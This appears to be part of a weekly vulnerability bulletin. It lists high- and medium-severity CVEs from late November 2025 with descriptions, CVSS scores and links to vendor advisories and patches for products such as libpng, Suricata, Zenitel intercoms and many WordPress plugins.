| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, working with large buffers in Lua scripts can lead to a stack overflow. Users of Lua rules and output scripts may be affected when working with large buffers. This includes a rule passing a large buffer to a Lua script. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling Lua rules and output scripts, or making sure limits, such as stream.depth.reassembly and HTTP response body limits (response-body-limit), are set to less than half the stack size. | 2025-11-26 | 7.5 | CVE-2025-64344 | https://github.com/OISF/suricata/security/advisories/GHSA-93fh-cgmc-w3rx https://github.com/OISF/suricata/commit/e13fe6a90dba210a478148c4084f6f5db17c5b5a |
| open-circle--valibot | Valibot helps validate data using a schema. In versions from 0.31.0 to 1.1.0, the EMOJI_REGEX used in the emoji action is vulnerable to a Regular Expression Denial of Service (ReDoS) attack. A short, maliciously crafted string (e.g., <100 characters) can cause the regex engine to consume excessive CPU time (minutes), leading to a Denial of Service (DoS) for the application. This issue has been patched in version 1.2.0. | 2025-11-26 | 7.5 | CVE-2025-66020 | https://github.com/open-circle/valibot/security/advisories/GHSA-vqpr-j7v3-hqw9 https://github.com/open-circle/valibot/commit/cfb799db301a953a0950d5c05a34a3ab121262dc |
| Opto 22--groov View Server | The users endpoint in the groov View API returns a list of all users and associated metadata including their API keys. This endpoint requires an Editor role to access and will display API keys for all users, including Administrators. | 2025-11-26 | 7.6 | CVE-2025-13084 | https://www.opto22.com/support/resources-tools/knowledgebase/kb91325 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-04 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-04.json |
| ov3rkll--ProjectList | The ProjectList plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 0.3.0. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-25 | 7.2 | CVE-2025-13376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/781c3b84-df80-470e-8bcb-3305a8bbb64a?source=cve https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L27 https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L27 |
| phpface--StreamTube Core | The StreamTube Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 4.78. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited if the 'registration password fields' enabled in theme options. | 2025-11-30 | 9.8 | CVE-2025-13615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b812a0d7-99a1-4f61-b78a-78cea6a2ada1?source=cve https://themeforest.net/item/streamtube-responsive-video-wordpress-theme/33821786 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, an out-of-bounds read vulnerability exists in png_image_read_composite when processing palette images with PNG_FLAG_OPTIMIZE_ALPHA enabled. The palette compositing code in png_init_read_transformations incorrectly applies background compositing during premultiplication, violating the invariant component ≤ alpha × 257 required by the simplified PNG API. This issue has been patched in version 1.6.51. | 2025-11-24 | 7.1 | CVE-2025-64720 | https://github.com/pnggroup/libpng/security/advisories/GHSA-hfc7-ph9c-wcww https://github.com/pnggroup/libpng/issues/686 https://github.com/pnggroup/libpng/pull/751 https://github.com/pnggroup/libpng/commit/08da33b4c88cfcd36e5a706558a8d7e0e4773643 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51. | 2025-11-24 | 7.1 | CVE-2025-65018 | https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g https://github.com/pnggroup/libpng/issues/755 https://github.com/pnggroup/libpng/pull/757 https://github.com/pnggroup/libpng/commit/16b5e3823918840aae65c0a6da57c78a5a496a4d https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea |
| Qode Interactive--Tiare Membership | The Tiare Membership plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.2. This is due to the 'tiare_membership_init_rest_api_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-11-27 | 9.8 | CVE-2025-13540 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf01a38-1fba-4c93-b3fa-acfdd5b19410?source=cve https://themeforest.net/item/tiare-wedding-vendor-directory-theme/26589165?s_rank=1 |
| QuantumNous--new-api | New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.9.6, a recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur. Because the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet. This issue has been patched in version 0.9.6. | 2025-11-24 | 8.5 | CVE-2025-62155 | https://github.com/QuantumNous/new-api/security/advisories/GHSA-9f46-w24h-69w4 |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in keylime where an attacker can exploit this flaw by registering a new agent using a different Trusted Platform Module (TPM) device but claiming an existing agent's unique identifier (UUID). This action overwrites the legitimate agent's identity, enabling the attacker to impersonate the compromised agent and potentially bypass security controls. | 2025-11-24 | 8.2 | CVE-2025-13609 | https://access.redhat.com/security/cve/CVE-2025-13609 RHBZ#2416761 |
| Red Hat--Red Hat Enterprise Linux 6 | A flaw was found in WebKitGTK and WPE WebKit. This vulnerability allows an out-of-bounds read and integer underflow, leading to a UIProcess crash (DoS) via a crafted payload to the GLib remote inspector server. | 2025-11-25 | 7.5 | CVE-2025-13502 | https://access.redhat.com/security/cve/CVE-2025-13502 RHBZ#2416300 |
| Redhat--Redhat | A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string. | 2025-11-26 | 7.7 | CVE-2025-13601 | https://access.redhat.com/security/cve/CVE-2025-13601 RHBZ#2416741 https://gitlab.gnome.org/GNOME/glib/-/issues/3827 https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4914 |
| ricardoboss--PubNet | PubNet is a self-hosted Dart & Flutter package service. Prior to version 1.1.3, the /api/storage/upload endpoint in PubNet allows unauthenticated users to upload packages as any user by providing arbitrary author-id values. This enables identity spoofing, privilege escalation, and supply chain attacks. This issue has been patched in version 1.1.3. | 2025-11-29 | 9.4 | CVE-2025-65112 | https://github.com/ricardoboss/PubNet/security/advisories/GHSA-pg82-fqrg-q6j5 |
| scripteo--Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager | The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to time-based SQL Injection via the 'site_id' parameter in all versions up to, and including, 4.95 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-24 | 7.5 | CVE-2025-7402 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5548b97d-14f0-4f50-b213-a19c02c240be?source=cve https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010 |
| Sneeit--Sneeit Framework | The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts. | 2025-11-25 | 9.8 | CVE-2025-6389 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b5ed8a39-50b0-4acf-9054-ba389c49f345?source=cve https://themeforest.net/item/flat-news-responsive-magazine-wordpress-theme/6000513#item-description__release-notes |
| sonalsinha21--SKT PayPal for WooCommerce | The SKT PayPal for WooCommerce plugin for WordPress is vulnerable to Payment Bypass in all versions up to, and including, 1.4. This is due to the plugin only enforcing client side controls instead of server-side controls when processing payments. This makes it possible for unauthenticated attackers to make confirmed purchases without actually paying for them. | 2025-11-27 | 7.5 | CVE-2025-7820 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a67b1b3-eb39-4e9a-ba44-ea637fc3bba1?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403118%40skt-paypal-for-woocommerce&new=3403118%40skt-paypal-for-woocommerce&sfp_email=&sfph_mail= |
| soportecibeles--AI Feeds | The AI Feeds plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check in the 'actualizador_git.php' file in all versions up to, and including, 1.0.11. This makes it possible for unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server which may make remote code execution possible. | 2025-11-25 | 9.8 | CVE-2025-13597 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5007dd0-a62c-4ad8-8f8b-eb3f4387c370?source=cve https://plugins.trac.wordpress.org/browser/ai-feeds/trunk/actualizador_git.php#L1 https://plugins.trac.wordpress.org/changeset/3402321/ai-feeds https://github.com/d0n601/CVE-2025-13597 https://ryankozak.com/posts/cve-2025-13597 |
| soportecibeles--CIBELES AI | The CIBELES AI plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check in the 'actualizador_git.php' file in all versions up to, and including, 1.10.8. This makes it possible for unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server which may make remote code execution possible. | 2025-11-25 | 9.8 | CVE-2025-13595 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b3e89a1c-7606-4391-a389-fa18d0967046?source=cve https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L1 https://plugins.trac.wordpress.org/changeset/3402311/cibeles-ai https://github.com/d0n601/CVE-2025-13595 https://ryankozak.com/posts/cve-2025-13595/ |
| taosir--WTCMS | A vulnerability was identified in taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665. Affected by this issue is the function delete of the file application/Admin/Controller/SlideController.class.php of the component SlideController. The manipulation of the argument ids leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13782 | VDB-333786 | taosir WTCMS SlideController SlideController.class.php delete sql injection VDB-333786 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #688837 | wtcms cms 1.0 SQL Injection https://www.yuque.com/shangu-vvuup/ydpg69/amhlbdhkw0pgt44g?singleDoc |
| taosir--WTCMS | A vulnerability was detected in taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665. Impacted is the function fetch of the file /index.php. Performing manipulation of the argument content results in code injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13786 | VDB-333790 | taosir WTCMS index.php fetch code injection VDB-333790 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689523 | wtcms cms 1.0 RCE https://github.com/TiKi-r/CVE-Report/blob/main/WtcmsRCE.md https://github.com/TiKi-r/CVE-Report/blob/main/WtcmsRCE.md#3-proof-of-concept-poc |
| Tryton--trytond | Tryton trytond 6.0 before 7.6.11 does not enforce access rights for the route of the HTML editor. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.70. | 2025-11-30 | 7.1 | CVE-2025-66423 | https://discuss.tryton.org/t/security-release-for-issue-14364/8952 https://foss.heptapod.net/tryton/tryton/-/issues/14364 |
| Uniong--WebITR | WebITR developed by Uniong has an Authentication Bypass vulnerability, allowing authenticated remote attackers to log into the system as any user by modifying a specific parameter. Attackers must first obtain a user ID to exploit this vulnerability. | 2025-11-28 | 7.5 | CVE-2025-13768 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| unitecms--Unlimited Elements for Elementor (Premium) | The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. A form with a file upload field must be created with the premium version of the plugin in order to exploit the vulnerability. However, once the form exists, the vulnerability is exploitable even if the premium version is deactivated and/or uninstalled. | 2025-11-27 | 7.2 | CVE-2025-13692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae603b13-dc09-4f83-8741-943d62615b3c?source=cve https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L598 https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1952 https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1960 https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_filters_process.class.php#L3279 https://plugins.trac.wordpress.org/changeset/3403331/ https://unlimited-elements.com/change-log/ |
| venusweb--EduKart Pro | The EduKart Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.3. This is due to the 'edukart_pro_register_user_front_end' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-11-25 | 9.8 | CVE-2025-13559 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d3a5be68-8073-48b0-a536-bb3a05e83dda?source=cve https://themeforest.net/item/edit-edukart-online-courses-education-lms-theme/52094805 |
| Zenitel--TCIV-3+ | An OS command injection vulnerability exists due to improper input validation. The application accepts a parameter directly from user input without verifying it is a valid IP address or filtering potentially malicious characters. This could allow an unauthenticated attacker to inject arbitrary commands. | 2025-11-26 | 10 | CVE-2025-64126 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | An OS command injection vulnerability exists due to insufficient sanitization of user-supplied input. The application accepts parameters that are later incorporated into OS commands without adequate validation. This could allow an unauthenticated attacker to execute arbitrary commands remotely. | 2025-11-26 | 10 | CVE-2025-64127 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | An OS command injection vulnerability exists due to incomplete validation of user-supplied input. Validation fails to enforce sufficient formatting rules, which could permit attackers to append arbitrary data. This could allow an unauthenticated attacker to inject arbitrary commands. | 2025-11-26 | 10 | CVE-2025-64128 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | Zenitel TCIV-3+ is vulnerable to a reflected cross-site scripting vulnerability, which could allow a remote attacker to execute arbitrary JavaScript on the victim's browser. | 2025-11-26 | 9.8 | CVE-2025-64130 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | Zenitel TCIV-3+ is vulnerable to an out-of-bounds write vulnerability, which could allow a remote attacker to crash the device. | 2025-11-26 | 7.6 | CVE-2025-64129 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| zephyrproject-rtos--Zephyr | An out-of-bound write can lead to an arbitrary code execution. Even on devices with some form of memory protection, this can still lead to a crash and a resultant denial of service. | 2025-11-26 | 7.6 | CVE-2025-9557 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-r3j3-c5v7-2ppf |
| zephyrproject-rtos--Zephyr | There is a potential OOB Write vulnerability in the gen_prov_start function in pb_adv.c. The full length of the received data is copied into the link.rx.buf receiver buffer without any validation on the data size. | 2025-11-26 | 7.6 | CVE-2025-9558 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8wvr-688x-68vr |
| ZTE--ElasticNet UME R32 | Improper Privilege Management vulnerability in ZTE ElasticNet UME R32 on Linux allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ElasticNet UME R32: ElasticNet_UME_R32_V16.23.20.04. | 2025-11-27 | 7.5 | CVE-2025-66314 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2180460616364429350 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| ABB--Terra AC wallbox | Stack-based Buffer Overflow vulnerability in ABB Terra AC wallbox.This issue affects Terra AC wallbox: through 1.8.33. | 2025-11-28 | 6.1 | CVE-2025-12143 | https://search.abb.com/library/Download.aspx?DocumentID=9AKK108471A8107&LanguageCode=en&DocumentPartId=&Action=Launch |
| AMD--AMD Prof | Improper input validation within AMD uProf can allow a local attacker to write out of bounds, potentially resulting in a crash or denial of service | 2025-11-24 | 5.5 | CVE-2025-29933 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html |
| AMD--AMD Prof | Improper input validation within AMD uprof can allow a local attacker to write to an arbitrary physical address, potentially resulting in crash or denial of service. | 2025-11-24 | 5.5 | CVE-2025-48511 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html |
| AMD--Xilinx Run Time (XRT) | Insufficient validation within Xilinx Run Time framework could allow a local attacker to escalate privileges from user space to kernel space, potentially compromising confidentiality, integrity, and/or availability. | 2025-11-24 | 5.7 | CVE-2025-0007 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| Anjaliavv51--Retro | Retro is an online platform providing items of vintage collections. Prior to version 2.4.7, Retro is vulnerable to a cross-site scripting (XSS) in the input handling component. This issue has been patched in version 2.4.7. | 2025-11-29 | 6.1 | CVE-2025-66036 | https://github.com/Anjaliavv51/Retro/security/advisories/GHSA-gvv6-p6h6-2vj2 |
| appglut--Locker Content | The Locker Content plugin for WordPress is vulnerable to Sensitive Information Exposure in version 1.0.0 via the 'lockerco_submit_post' AJAX endpoint. This makes it possible for unauthenticated attackers to extract content from posts that has been protected by the plugin. | 2025-11-25 | 5.3 | CVE-2025-12525 | https://www.wordfence.com/threat-intel/vulnerabilities/id/927f94b0-2a5d-4d17-a05b-7940d7976158?source=cve https://wordpress.org/plugins/locker-content/ |
| assafp--Poll, Survey & Quiz Maker Plugin by Opinion Stage | The Poll, Survey & Quiz Maker Plugin by Opinion Stage plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 19.12.0. This is due to missing or insufficient nonce validation on the disconnect_account_action function. This makes it possible for unauthenticated attackers to disconnect the site from the Opinion Stage platform integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-27 | 4.3 | CVE-2025-13143 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2c16048a-6b05-48ef-92c3-6e3a42909adb?source=cve https://plugins.trac.wordpress.org/browser/social-polls-by-opinionstage/tags/19.12.0/src/Modules/Admin.php#L195 https://plugins.trac.wordpress.org/browser/social-polls-by-opinionstage/tags/19.12.0/src/Modules/Admin.php#L196 |
| autochat--Autochat Automatic Conversation | The Autochat Automatic Conversation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_auycht_saveCid' AJAX endpoint in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to connect and disconnect the client ID. | 2025-11-25 | 5.3 | CVE-2025-12043 | https://www.wordfence.com/threat-intel/vulnerabilities/id/089b3a1b-0f4b-4ba5-85d8-c1f6b74fe7eb?source=cve https://wordpress.org/plugins/auyautochat-for-wp/ |
| ays-pro--AI ChatBot with ChatGPT and Content Generator by AYS | The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.0 via the ays_chatgpt_pinecone_upsert function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-11-27 | 6.5 | CVE-2025-13378 | https://www.wordfence.com/threat-intel/vulnerabilities/id/293ad145-dc93-4d7a-83ba-78f8c730ed6d?source=cve https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3483 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/trunk/admin/class-chatgpt-assistant-admin.php#L3483 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/trunk/includes/class-chatgpt-assistant.php#L222 https://plugins.trac.wordpress.org/changeset/3402237/ays-chatgpt-assistant/tags/2.7.1/admin/class-chatgpt-assistant-admin.php?old=3382650&old_path=ays-chatgpt-assistant%2Ftags%2F2.6.9%2Fadmin%2Fclass-chatgpt-assistant-admin.php |
| ays-pro--AI ChatBot with ChatGPT and Content Generator by AYS | The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'ays_chatgpt_save_wp_media' function in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to upload media files. | 2025-11-27 | 5.3 | CVE-2025-13381 | https://www.wordfence.com/threat-intel/vulnerabilities/id/be3411ec-0e34-4b0b-a04c-98ac94396989?source=cve https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3585 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/includes/class-chatgpt-assistant.php#L222 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3268 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3597 https://plugins.trac.wordpress.org/changeset/3402237/ays-chatgpt-assistant/tags/2.7.1/admin/class-chatgpt-assistant-admin.php?old=3382650&old_path=ays-chatgpt-assistant%2Ftags%2F2.6.9%2Fadmin%2Fclass-chatgpt-assistant-admin.php |
| bestweblayout--Job Board by BestWebSoft | The Job Board by BestWebSoft plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.1. This is due to the plugin storing the entire unsanitized `$_GET` superglobal array directly into the database via `update_user_meta()` when users save search results, and later outputting this data without proper escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute whenever a user accesses the saved search or views their profile, granted they can trick the user into performing the search and saving the results. | 2025-11-25 | 6.1 | CVE-2025-13383 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1eb1622f-19fb-472e-871b-9a456f80f390?source=cve https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L2354 https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L2355 https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L1680 |
| buywptemplates--Ace Post Type Builder | The Ace Post Type Builder plugin for WordPress is vulnerable to unauthorized custom taxonomy deletion due to missing authorization validation on the cptb_delete_custom_taxonomy() function in all versions up to, and including, 1.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary custom taxonomies. | 2025-11-25 | 5.3 | CVE-2025-13405 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b56cef33-057b-4c40-945f-68306597b00b?source=cve https://plugins.trac.wordpress.org/browser/ace-post-type-builder/trunk/includes/class-cptb-core.php#L400 https://plugins.trac.wordpress.org/browser/ace-post-type-builder/tags/1.9/includes/class-cptb-core.php#L400 |
| bylancer--Bookme Free Online Appointment Booking and Scheduling Plugin | The Bookme - Free Online Appointment Booking and Scheduling Plugin for WordPress is vulnerable to time-based SQL Injection via the `filter[status]` parameter in all versions up to, and including, 4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-25 | 4.9 | CVE-2025-13385 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c17222-5de5-4ecd-a7c6-beabe7624c5b?source=cve https://plugins.trac.wordpress.org/browser/bookme-free-appointment-booking-system/tags/4.2/app/admin/Bookings.php#L123 https://plugins.trac.wordpress.org/browser/bookme-free-appointment-booking-system/trunk/app/admin/Bookings.php#L123 |
| bytecodealliance--wasm-micro-runtime | WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, an out-of-bounds array access issue exists in WAMR's fast interpreter mode during WASM bytecode loading. When frame_ref_bottom and frame_offset_bottom arrays are at capacity and a GET_GLOBAL(I32) opcode is encountered, frame_ref_bottom is expanded but frame_offset_bottom may not be. If this is immediately followed by an if opcode that triggers preserve_local_for_block, the function traverses arrays using stack_cell_num as the upper bound, causing out-of-bounds access to frame_offset_bottom since it wasn't expanded to match the increased stack_cell_num. This issue has been patched in version 2.4.4. | 2025-11-25 | 5.1 | CVE-2025-64713 | https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-gvx3-gg3x-rjcx https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4 |
| bytecodealliance--wasm-micro-runtime | WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, WAMR is susceptible to a segmentation fault in v128.store instruction. This issue has been patched in version 2.4.4. | 2025-11-25 | 4.7 | CVE-2025-64704 | https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-2f2p-wf5w-82qr https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4 |
| caido--caido | Caido is a web security auditing toolkit. Prior to version 0.53.0, the Markdown renderer used in Caido's Findings page improperly handled user-supplied Markdown, allowing attacker-controlled links to be rendered without confirmation. When a user opened a finding generated through the scanner, or other plugins, clicking these injected links could redirect the Caido application to an attacker-controlled domain, enabling phishing style attacks. This issue has been patched in version 0.53.0. | 2025-11-26 | 4.3 | CVE-2025-66025 | https://github.com/caido/caido/security/advisories/GHSA-cf52-h5mw-gmc2 |
| cilium--cilium | Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicys which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than intended by the policy authors. In such cases, the toCIDRset section of the derived policy is not generated, which means outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue. | 2025-11-29 | 4 | CVE-2025-64715 | https://github.com/cilium/cilium/security/advisories/GHSA-38pp-6gcp-rqvm https://github.com/cilium/cilium/commit/a385856b59c8289cc7273fa3a3062bbf0ef96c97 https://github.com/cilium/cilium/releases/tag/v1.16.17 https://github.com/cilium/cilium/releases/tag/v1.17.10 https://github.com/cilium/cilium/releases/tag/v1.18.4 |
| code-projects--Blog Site | A security vulnerability has been detected in code-projects Blog Site 1.0. Impacted is the function category_exists of the file /resources/functions/blog.php of the component Category Handler. Such manipulation of the argument name/field leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. Multiple endpoints are affected. | 2025-11-24 | 6.3 | CVE-2025-13575 | VDB-333339 | code-projects Blog Site Category blog.php category_exists sql injection VDB-333339 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698769 | https://code-projects.org/ blog site in php with source code 1.0 SQL Injection Submit #698771 | https://code-projects.org/ blog site in php with source code 1.0 SQL Injection (Duplicate) https://github.com/Yohane-Mashiro/cve/blob/main/SQL%20injection1.md https://github.com/Yohane-Mashiro/cve/blob/main/SQL%20injection2.md https://code-projects.org/ |
| code-projects--Blog Site | A vulnerability was detected in code-projects Blog Site 1.0. The affected element is an unknown function of the file /admin.php. Performing manipulation results in improper authorization. It is possible to initiate the attack remotely. The exploit is now public and may be used. Multiple endpoints are affected. | 2025-11-24 | 6.3 | CVE-2025-13576 | VDB-333340 | code-projects Blog Site admin.php improper authorization VDB-333340 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698772 | https://code-projects.org/ Blog Site In PHP With Source Code 1.0 Unauthorized https://github.com/Yohane-Mashiro/cve/blob/main/Unauthorized.md https://code-projects.org/ |
